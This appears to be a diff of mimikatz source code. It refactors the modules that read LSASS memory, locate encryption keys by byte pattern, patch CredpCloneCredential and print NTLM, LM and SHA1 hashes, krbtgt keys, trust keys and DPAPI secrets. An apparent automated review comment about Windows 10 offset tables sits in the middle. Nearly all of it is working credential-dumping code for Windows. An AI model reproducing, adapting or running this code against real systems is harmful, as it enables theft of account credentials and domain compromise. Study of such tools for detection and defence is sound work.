||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WN63_CredpCloneCredential), PTRN_WN63_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {6}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WN63_CredpCloneCredential), PTRN_WN63_CredpCloneCredential}, {sizeof(PATC_WN64_CredpCloneCredentialJmpShort), PATC_WN64_CredpCloneCredentialJmpShort}, {6}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN63_CredpCloneCredential), PTRN_WN63_CredpCloneCredential}, {sizeof(PATC_WN64_CredpCloneCredentialJmpShort), PATC_WN64_CredpCloneCredentialJmpShort}, {6}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
BYTE PTRN_WNT5_CredpCloneCredential[] = {0x8b, 0x43, 0x04, 0x83, 0xf8, 0x01, 0x74};
|
||||
@ -395,7 +395,7 @@ KULL_M_PATCH_GENERIC CredpCloneCredentialReferences[] = {
|
||||
{KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WNT5_CredpCloneCredential), PTRN_WNT5_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {6}},
|
||||
{KULL_M_WIN_BUILD_VISTA,{sizeof(PTRN_WN60_CredpCloneCredential), PTRN_WN60_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {7}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WN62_CredpCloneCredential), PTRN_WN62_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {0}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WN64_CredpCloneCredential), PTRN_WN64_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {0}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN64_CredpCloneCredential), PTRN_WN64_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {0}},
|
||||
};
|
||||
#endif
|
||||
|
||||
@ -406,10 +406,9 @@ NTSTATUS kuhl_m_vault_cred(int argc, wchar_t * argv[])
|
||||
DWORD flags = 0;
|
||||
SERVICE_STATUS_PROCESS ServiceStatusProcess;
|
||||
PKULL_M_MEMORY_HANDLE hMemory;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION iModuleSamSrv;
|
||||
HANDLE hSamSs;
|
||||
KULL_M_MEMORY_ADDRESS aPatternMemory = {NULL, &hLocalMemory}, aPatchMemory = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aPatternMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aPatchMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory;
|
||||
PKULL_M_PATCH_GENERIC CredpCloneCredentialReference;
|
||||
|
||||
|
@ -35,8 +35,7 @@ PDWORD g_cbRandomKey;
|
||||
NTSTATUS kuhl_m_sekurlsa_nt5_init()
|
||||
{
|
||||
struct {PVOID LsaIRegisterNotification; PVOID LsaICancelNotification;} extractPkgFunctionTable;
|
||||
KULL_M_MEMORY_HANDLE hMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aMemory = {&extractPkgFunctionTable, &hMemory};
|
||||
KULL_M_MEMORY_ADDRESS aMemory = {&extractPkgFunctionTable, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory;
|
||||
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION vbInfos;
|
||||
DWORD sizeOfSearch = sizeof(PTRN_WNT5_LsaInitializeProtectedMemory_KEY);
|
||||
@ -50,7 +49,7 @@ NTSTATUS kuhl_m_sekurlsa_nt5_init()
|
||||
|
||||
if(kuhl_m_sekurlsa_nt5_hLsasrv)
|
||||
{
|
||||
if(kull_m_process_getVeryBasicModuleInformationsForName(&hMemory, L"lsasrv.dll", &vbInfos))
|
||||
if(kull_m_process_getVeryBasicModuleInformationsForName(&KULL_M_MEMORY_GLOBAL_OWN_HANDLE, L"lsasrv.dll", &vbInfos))
|
||||
{
|
||||
sMemory.kull_m_memoryRange.kull_m_memoryAdress = vbInfos.DllBase;
|
||||
sMemory.kull_m_memoryRange.size = vbInfos.SizeOfImage;
|
||||
@ -129,8 +128,7 @@ NTSTATUS kuhl_m_sekurlsa_nt5_clean()
|
||||
NTSTATUS kuhl_m_sekurlsa_nt5_acquireKeys(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION lsassLsaSrvModule)
|
||||
{
|
||||
NTSTATUS status = STATUS_NOT_FOUND;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, cLsass->hLsassMem}, aLocalMemory = {PTRN_WNT5_LsaInitializeProtectedMemory_KEY, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, cLsass->hLsassMem}, aLocalMemory = {PTRN_WNT5_LsaInitializeProtectedMemory_KEY, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory = {{{lsassLsaSrvModule->DllBase.address, cLsass->hLsassMem}, lsassLsaSrvModule->SizeOfImage}, NULL};
|
||||
DWORD sizeOfSearch = sizeof(PTRN_WNT5_LsaInitializeProtectedMemory_KEY);
|
||||
LONG offFeedBack = OFFS_WNT5_g_Feedback, offpDESXKey = OFFS_WNT5_g_pDESXKey, offpRandomKey = OFFS_WNT5_g_pRandomKey;
|
||||
@ -179,8 +177,7 @@ NTSTATUS kuhl_m_sekurlsa_nt5_acquireKeys(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKULL_
|
||||
BOOL kuhl_m_sekurlsa_nt5_acquireKey(PKULL_M_MEMORY_ADDRESS aLsassMemory, PBYTE Key, SIZE_T taille)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&aLsassMemory->address, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&aLsassMemory->address, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
#ifdef _M_X64
|
||||
LONG offset64;
|
||||
aLocalMemory.address = &offset64;
|
||||
|
@ -13,7 +13,7 @@ KULL_M_PATCH_GENERIC PTRN_WIN8_LsaInitializeProtectedMemory_KeyRef[] = { // Init
|
||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WNO8_LsaInitializeProtectedMemory_KEY), PTRN_WNO8_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {63, -69, 25}},
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WNO8_LsaInitializeProtectedMemory_KEY), PTRN_WNO8_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {59, -61, 25}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN8_LsaInitializeProtectedMemory_KEY), PTRN_WIN8_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {62, -70, 23}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WN10_LsaInitializeProtectedMemory_KEY), PTRN_WN10_LsaInitializeProtectedMemory_KEY},{0, NULL}, {61, -73, 16}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN10_LsaInitializeProtectedMemory_KEY), PTRN_WN10_LsaInitializeProtectedMemory_KEY},{0, NULL}, {61, -73, 16}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
BYTE PTRN_WALL_LsaInitializeProtectedMemory_KEY[] = {0x6a, 0x02, 0x6a, 0x10, 0x68};
|
||||
@ -21,7 +21,7 @@ KULL_M_PATCH_GENERIC PTRN_WIN8_LsaInitializeProtectedMemory_KeyRef[] = { // Init
|
||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WALL_LsaInitializeProtectedMemory_KEY), PTRN_WALL_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {5, -76, -21}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WALL_LsaInitializeProtectedMemory_KEY), PTRN_WALL_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {5, -69, -18}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WALL_LsaInitializeProtectedMemory_KEY), PTRN_WALL_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {5, -79, -22}}, // post 11/11
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WALL_LsaInitializeProtectedMemory_KEY), PTRN_WALL_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {5, -79, -22}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WALL_LsaInitializeProtectedMemory_KEY), PTRN_WALL_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {5, -79, -22}},
|
||||
};
|
||||
|
||||
#endif
|
||||
@ -158,8 +158,7 @@ NTSTATUS kuhl_m_sekurlsa_nt6_LsaEncryptMemory(PUCHAR pMemory, ULONG cbMemory, BO
|
||||
NTSTATUS kuhl_m_sekurlsa_nt6_acquireKeys(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION lsassLsaSrvModule)
|
||||
{
|
||||
NTSTATUS status = STATUS_NOT_FOUND;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, cLsass->hLsassMem}, aLocalMemory = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, cLsass->hLsassMem}, aLocalMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory = {{{lsassLsaSrvModule->DllBase.address, cLsass->hLsassMem}, lsassLsaSrvModule->SizeOfImage}, NULL};
|
||||
#ifdef _M_X64
|
||||
LONG offset64;
|
||||
@ -201,8 +200,7 @@ NTSTATUS kuhl_m_sekurlsa_nt6_acquireKeys(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKULL_
|
||||
BOOL kuhl_m_sekurlsa_nt6_acquireKey(PKULL_M_MEMORY_ADDRESS aLsassMemory, PKUHL_M_SEKURLSA_OS_CONTEXT pOs, PKIWI_BCRYPT_GEN_KEY pGenKey)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&aLsassMemory->address, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&aLsassMemory->address, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KIWI_BCRYPT_HANDLE_KEY hKey; PKIWI_HARD_KEY pHardKey;
|
||||
PVOID buffer; SIZE_T taille; LONG offset;
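Review bot: Raising the Windows 10 entry of the x64 `PTRN_WIN8_LsaInitializeProtectedMemory_KeyRef` table from `KULL_M_WIN_BUILD_10` (9800) to `KULL_M_WIN_BUILD_10_1507` (10240) silently changes which displacements technical-preview builds 9800–10239 receive: if the generic search picks the last entry whose build is not above the target (the lookup is not visible here), those builds now match the Windows 8 entry `{62, -70, 23}` instead of `{61, -73, 16}`, since the x64 table has no BLUE entry, and the key search will read the wrong offsets. If preview builds are being dropped on purpose, a comment on the table makes that explicit, e.g. `// 10240 (1507) is the first supported Win10 build; 9800-10239 previews fall back to the Win8 entry`; otherwise keep a 9800 row. The same threshold shift happens in the x86 table, but there the 1507 offsets equal the BLUE entry's, so it is harmless. The body of `kuhl_m_sekurlsa_nt6_acquireKey` continues outside this section.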
|
||||
|
||||
|
@ -66,8 +66,7 @@ NTSTATUS kuhl_m_sekurlsa_nt63_clean()
|
||||
NTSTATUS kuhl_m_sekurlsa_nt63_acquireKeys(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION lsassLsaSrvModule)
|
||||
{
|
||||
NTSTATUS status = STATUS_NOT_FOUND;
|
||||
KULL_M_MEMORY_HANDLE hLocalBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalAddr = {kuhl_m_sekurlsa_nt63_decryptorCode, &hLocalBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aLocalAddr = {kuhl_m_sekurlsa_nt63_decryptorCode, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
aProcessUnprotect.hMemory = cLsass->hLsassMem;
|
||||
aProcessProtect.hMemory = cLsass->hLsassMem;
|
||||
|
||||
@ -99,8 +98,7 @@ VOID WINAPI kuhl_m_sekurlsa_nt63_LsaUnprotectMemory (IN PVOID Buffer, IN ULONG B
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_nt63_LsaEncryptMemory(IN PVOID Buffer, IN ULONG BufferSize, IN BOOL Encrypt)
|
||||
{
|
||||
KULL_M_MEMORY_HANDLE hLocalBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aMemoryAddr = {NULL, aProcessProtect.hMemory}, aLocalAddr = {NULL, &hLocalBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aMemoryAddr = {NULL, aProcessProtect.hMemory}, aLocalAddr = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
DWORD exitCode, totalSize = sizeof(ULONG) + BufferSize;
|
||||
PKULL_M_MEMORY_ADDRESS pAddress = Encrypt ? &aProcessProtect : &aProcessUnprotect;
|
||||
NTSTATUS status;
|
||||
|
@ -259,8 +259,7 @@ NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalDa
|
||||
KIWI_BASIC_SECURITY_LOGON_SESSION_DATA sessionData;
|
||||
ULONG nbListes = 1, i;
|
||||
PVOID pStruct;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS securityStruct, data = {&nbListes, &hLocalMemory}, aBuffer = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS securityStruct, data = {&nbListes, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
BOOL retCallback = TRUE;
|
||||
const KUHL_M_SEKURLSA_ENUM_HELPER * helper;
|
||||
NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
|
||||
@ -294,7 +293,7 @@ NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalDa
|
||||
{
|
||||
securityStruct.address = &LogonSessionList[i];
|
||||
data.address = &pStruct;
|
||||
data.hMemory = &hLocalMemory;
|
||||
data.hMemory = &KULL_M_MEMORY_GLOBAL_OWN_HANDLE;
|
||||
if(aBuffer.address = LocalAlloc(LPTR, helper->tailleStruct))
|
||||
{
|
||||
if(kull_m_memory_copy(&data, &securityStruct, sizeof(PVOID)))
|
||||
@ -416,7 +415,7 @@ KULL_M_PATCH_GENERIC SecDataReferences[] = {
|
||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_W2K8_SecData), PTRN_W2K8_SecData}, {0, NULL}, { 11, 39}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_W2K12_SecData), PTRN_W2K12_SecData}, {0, NULL}, { 10, 39}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_W2K12R2_SecData), PTRN_W2K12R2_SecData}, {0, NULL}, {-12, 39}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_W2K12R2_SecData), PTRN_W2K12R2_SecData}, {0, NULL}, { -9, 39}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_W2K12R2_SecData), PTRN_W2K12R2_SecData}, {0, NULL}, { -9, 39}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
BYTE PTRN_W2K3_SecData[] = {0x53, 0x56, 0x8d, 0x45, 0x98, 0x50, 0xb9};
|
||||
@ -431,8 +430,7 @@ NTSTATUS kuhl_m_sekurlsa_krbtgt(int argc, wchar_t * argv[])
|
||||
NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
|
||||
LONG l = 0;
|
||||
DUAL_KRBTGT dualKrbtgt = {NULL, NULL};
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, aLocal = {&dualKrbtgt, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, aLocal = {&dualKrbtgt, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
|
||||
if(NT_SUCCESS(status))
|
||||
{
|
||||
@ -459,8 +457,7 @@ void kuhl_m_sekurlsa_krbtgt_keys(PVOID addr, PCWSTR prefix)
|
||||
DWORD sizeForCreds, i;
|
||||
KIWI_KRBTGT_CREDENTIALS_6 tmpCred6, *creds6;
|
||||
KIWI_KRBTGT_CREDENTIALS_5 tmpCred5, *creds5;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {addr, cLsass.hLsassMem}, aLocal = {&tmpCred6, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {addr, cLsass.hLsassMem}, aLocal = {&tmpCred6, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
|
||||
if(addr)
|
||||
{
|
||||
@ -554,8 +551,7 @@ KULL_M_PATCH_GENERIC SysCredReferences[] = {
|
||||
NTSTATUS kuhl_m_sekurlsa_dpapi_system(int argc, wchar_t * argv[])
|
||||
{
|
||||
NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, aLocal = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, aLocal = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
PKUHL_M_SEKURLSA_PACKAGE pPackage = (cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_8) ? &kuhl_m_sekurlsa_dpapi_svc_package : &kuhl_m_sekurlsa_dpapi_lsa_package;
|
||||
PVOID pBool = NULL, pShaSystem = NULL, pShaUser = NULL;
|
||||
BOOL fSystemCredsInitialized;
|
||||
@ -617,8 +613,7 @@ NTSTATUS kuhl_m_sekurlsa_trust(int argc, wchar_t * argv[])
|
||||
NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
|
||||
PVOID buffer;
|
||||
KDC_DOMAIN_INFO domainInfo;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, data = {&buffer, &hBuffer}, aBuffer = {&domainInfo, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, data = {&buffer, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aBuffer = {&domainInfo, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
|
||||
if(cLsass.osContext.BuildNumber >= KULL_M_WIN_BUILD_7)
|
||||
{
|
||||
@ -654,8 +649,7 @@ NTSTATUS kuhl_m_sekurlsa_trust(int argc, wchar_t * argv[])
|
||||
|
||||
void kuhl_m_sekurlsa_trust_domainkeys(struct _KDC_DOMAIN_KEYS_INFO * keysInfo, PCWSTR prefix, BOOL incoming, PCUNICODE_STRING domain)
|
||||
{
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {keysInfo->keys, cLsass.hLsassMem}, aData = {NULL, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {keysInfo->keys, cLsass.hLsassMem}, aData = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
DWORD i;
|
||||
PKDC_DOMAIN_KEYS domainKeys;
|
||||
|
||||
@ -718,8 +712,7 @@ void kuhl_m_sekurlsa_trust_domaininfo(struct _KDC_DOMAIN_INFO * info)
|
||||
|
||||
void kuhl_m_sekurlsa_bkey(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib, PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, BOOL isExport)
|
||||
{
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass->hLsassMem}, aData = {NULL, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass->hLsassMem}, aData = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
GUID guid;
|
||||
DWORD cb;
|
||||
PVOID pGuid, pKeyLen, pKeyBuffer;
|
||||
@ -915,9 +908,7 @@ NTSTATUS kuhl_m_sekurlsa_pth(int argc, wchar_t * argv[])
|
||||
|
||||
VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, ULONG flags)
|
||||
{
|
||||
PUNICODE_STRING credentials, username = NULL, domain = NULL, password = NULL;
|
||||
PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds;
|
||||
PMSV1_0_PRIMARY_CREDENTIAL_10 pPrimaryCreds10;
|
||||
PUNICODE_STRING username = NULL, domain = NULL, password = NULL;
|
||||
PRPCE_CREDENTIAL_KEYCREDENTIAL pRpceCredentialKeyCreds;
|
||||
PKERB_HASHPASSWORD_GENERIC pHashPassword;
|
||||
UNICODE_STRING buffer;
|
||||
@ -925,6 +916,8 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
||||
DWORD type, i;
|
||||
BOOL isNull = FALSE;
|
||||
PWSTR sid = NULL;
|
||||
PBYTE msvCredentials;
|
||||
const MSV1_0_PRIMARY_HELPER * pMSVHelper;
|
||||
|
||||
if(mesCreds)
|
||||
{
|
||||
@ -932,77 +925,49 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
||||
if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL)
|
||||
{
|
||||
type = flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK;
|
||||
credentials = (PUNICODE_STRING) mesCreds;
|
||||
if(credentials->Buffer)
|
||||
if(msvCredentials = (PBYTE) ((PUNICODE_STRING) mesCreds)->Buffer)
|
||||
{
|
||||
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
|
||||
(*lsassLocalHelper->pLsaUnprotectMemory)(((PUNICODE_STRING) mesCreds)->Buffer, ((PUNICODE_STRING) mesCreds)->Length);
|
||||
(*lsassLocalHelper->pLsaUnprotectMemory)(msvCredentials, ((PUNICODE_STRING) mesCreds)->Length);
|
||||
|
||||
switch(type)
|
||||
{
|
||||
case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY:
|
||||
pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL) credentials->Buffer;
|
||||
kull_m_string_MakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->UserName, FALSE);
|
||||
kull_m_string_MakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->LogonDomainName, FALSE);
|
||||
|
||||
kprintf(L"\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds->UserName, &pPrimaryCreds->LogonDomainName);
|
||||
if(pPrimaryCreds->isLmOwfPassword)
|
||||
{
|
||||
kprintf(L"\n\t * LM : ");
|
||||
kull_m_string_wprintf_hex(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
}
|
||||
if(pPrimaryCreds->isNtOwfPassword)
|
||||
{
|
||||
kprintf(L"\n\t * NTLM : ");
|
||||
kull_m_string_wprintf_hex(pPrimaryCreds->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
}
|
||||
if(pPrimaryCreds->isShaOwPassword)
|
||||
{
|
||||
kprintf(L"\n\t * SHA1 : ");
|
||||
kull_m_string_wprintf_hex(pPrimaryCreds->ShaOwPassword, SHA_DIGEST_LENGTH, 0);
|
||||
}
|
||||
if(sid && (pPrimaryCreds->isNtOwfPassword || pPrimaryCreds->ShaOwPassword))
|
||||
kuhl_m_dpapi_oe_credential_add(sid, NULL, pPrimaryCreds->isNtOwfPassword ? pPrimaryCreds->NtOwfPassword : NULL, pPrimaryCreds->isShaOwPassword ? pPrimaryCreds->ShaOwPassword : NULL, NULL, NULL);
|
||||
break;
|
||||
case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10:
|
||||
pPrimaryCreds10 = (PMSV1_0_PRIMARY_CREDENTIAL_10) credentials->Buffer;
|
||||
kull_m_string_MakeRelativeOrAbsoluteString(pPrimaryCreds10, &pPrimaryCreds10->UserName, FALSE);
|
||||
kull_m_string_MakeRelativeOrAbsoluteString(pPrimaryCreds10, &pPrimaryCreds10->LogonDomainName, FALSE);
|
||||
|
||||
kprintf(L"\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds10->UserName, &pPrimaryCreds10->LogonDomainName);
|
||||
kprintf(L"\n\t * Flags : I%02x/N%02x/L%02x/S%02x", pPrimaryCreds10->isIso, pPrimaryCreds10->isNtOwfPassword, pPrimaryCreds10->isLmOwfPassword, pPrimaryCreds10->isShaOwPassword);
|
||||
if(!pPrimaryCreds10->isIso)
|
||||
{
|
||||
if(pPrimaryCreds10->isLmOwfPassword)
|
||||
case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY:
|
||||
pMSVHelper = kuhl_m_sekurlsa_msv_helper(pData->cLsass);
|
||||
kull_m_string_MakeRelativeOrAbsoluteString(msvCredentials, (PUNICODE_STRING) (msvCredentials + pMSVHelper->offsetToLogonDomain), FALSE);
|
||||
kull_m_string_MakeRelativeOrAbsoluteString(msvCredentials, (PUNICODE_STRING) (msvCredentials + pMSVHelper->offsetToUserName), FALSE);
|
||||
kprintf(L"\n\t * Username : %wZ\n\t * Domain : %wZ", (PUNICODE_STRING) (msvCredentials + pMSVHelper->offsetToUserName), (PUNICODE_STRING) (msvCredentials + pMSVHelper->offsetToLogonDomain));
|
||||
if(!pMSVHelper->offsetToisIso || !*(PBOOLEAN) (msvCredentials + pMSVHelper->offsetToisIso))
|
||||
{
|
||||
kprintf(L"\n\t * LM : ");
|
||||
kull_m_string_wprintf_hex(pPrimaryCreds10->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
if(*(PBOOLEAN) (msvCredentials + pMSVHelper->offsetToisLmOwfPassword))
|
||||
{
|
||||
kprintf(L"\n\t * LM : ");
|
||||
kull_m_string_wprintf_hex(msvCredentials + pMSVHelper->offsetToLmOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
}
|
||||
if(*(PBOOLEAN) (msvCredentials + pMSVHelper->offsetToisNtOwfPassword))
|
||||
{
|
||||
kprintf(L"\n\t * NTLM : ");
|
||||
kull_m_string_wprintf_hex(msvCredentials + pMSVHelper->offsetToNtOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
}
|
||||
if(*(PBOOLEAN) (msvCredentials + pMSVHelper->offsetToisShaOwPassword))
|
||||
{
|
||||
kprintf(L"\n\t * SHA1 : ");
|
||||
kull_m_string_wprintf_hex(msvCredentials + pMSVHelper->offsetToShaOwPassword, SHA_DIGEST_LENGTH, 0);
|
||||
}
|
||||
if(sid && (*(PBOOLEAN) (msvCredentials + pMSVHelper->offsetToisNtOwfPassword) || *(PBOOLEAN) (msvCredentials + pMSVHelper->offsetToisShaOwPassword)))
|
||||
